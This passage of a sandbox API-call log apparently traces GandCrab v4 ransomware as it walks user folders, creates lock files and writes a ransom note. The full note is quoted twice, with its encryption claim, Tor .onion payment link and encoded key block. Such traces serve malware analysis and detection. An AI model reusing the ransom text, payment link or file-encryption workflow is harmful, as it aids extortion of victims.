Sidebar\\settings.ini.KRAB" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\settings.ini.krab")) returned 1 [0100.081] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.082] FindNextFileW (in: hFindFile=0xfbdb20, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0100.082] FindClose (in: hFindFile=0xfbdb20 | out: hFindFile=0xfbdb20) returned 1 [0100.082] CloseHandle (hObject=0x778) returned 1 [0100.082] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0 [0100.082] FindClose (in: hFindFile=0xfbdae0 | out: hFindFile=0xfbdae0) returned 1 [0100.082] CloseHandle (hObject=0x3a8) returned 1 [0100.082] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0100.082] lstrcmpW (lpString1="Temp", lpString2=".") returned 1 [0100.082] lstrcmpW (lpString1="Temp", lpString2="..") returned 1 [0100.082] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\", lpString2="Temp" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp") returned="C:\\Users\\Default\\AppData\\Local\\Temp" [0100.082] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp\\") returned="C:\\Users\\Default\\AppData\\Local\\Temp\\" [0100.083] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.083] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.083] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.083] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.083] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.083] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.083] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.084] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\\\KRAB-DECRYPT.txt") returned 53 [0100.084] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\local\\temp\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0100.084] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.084] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.085] CloseHandle (hObject=0x3a8) returned 1 [0100.085] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.086] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.086] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x116)) [0100.086] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.086] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.086] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.087] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\d2ca4a08d2ca4dee3d.lock") returned 59 [0100.087] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\appdata\\local\\temp\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3a8 [0100.088] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.088] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.088] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Temp\\") returned 36 [0100.088] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp\\*") returned="C:\\Users\\Default\\AppData\\Local\\Temp\\*" [0100.088] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0xfbdae0 [0100.088] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0100.088] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0100.089] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0100.089] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0100.089] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0100.089] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0100.089] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0100.089] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\AppData\\Local\\Temp\\d2ca4a08d2ca4dee3d.lock" [0100.089] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.089] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 64 [0100.089] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Temp\\d2ca4a08d2ca4dee3d.lock") returned 59 [0100.089] lstrlenW (lpString=".lock") returned 5 [0100.089] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.090] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0100.090] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.090] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.090] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0100.090] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0100.090] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0100.090] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\AppData\\Local\\Temp\\KRAB-DECRYPT.txt" [0100.090] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.091] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\KRAB-DECRYPT.txt.KRAB") returned 57 [0100.091] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Temp\\KRAB-DECRYPT.txt") returned 52 [0100.091] lstrlenW (lpString=".txt") returned 4 [0100.091] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.096] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0100.096] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.097] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Temp\\KRAB-DECRYPT.txt") returned 52 [0100.097] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Temp\\KRAB-DECRYPT.txt") returned 52 [0100.097] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0100.097] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0100.097] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0100.097] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0100.097] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0100.097] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0100.097] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0100.097] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0100.097] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0100.097] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0100.097] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.098] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0 [0100.098] FindClose (in: hFindFile=0xfbdae0 | out: hFindFile=0xfbdae0) returned 1 [0100.098] CloseHandle (hObject=0x3a8) returned 1 [0100.098] FindNextFileW (in: hFindFile=0xfbe0a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0100.098] lstrcmpW (lpString1="Temporary Internet Files", lpString2=".") returned 1 [0100.098] lstrcmpW (lpString1="Temporary Internet Files", lpString2="..") returned 1 [0100.098] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\", lpString2="Temporary Internet Files" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files") returned="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files" [0100.098] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\") returned="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\" [0100.098] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.098] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.099] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.099] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.099] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.099] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.099] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.099] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\\\KRAB-DECRYPT.txt") returned 73 [0100.100] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\local\\temporary internet files\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0100.101] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.101] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.101] CloseHandle (hObject=0x3a8) returned 1 [0100.101] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.102] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.102] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2f, wMilliseconds=0x126)) [0100.102] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.102] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.103] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.103] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\d2ca4a08d2ca4dee3d.lock") returned 79 [0100.110] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\appdata\\local\\temporary internet files\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3a8 [0100.111] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.112] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.112] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\") returned 56 [0100.112] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*") 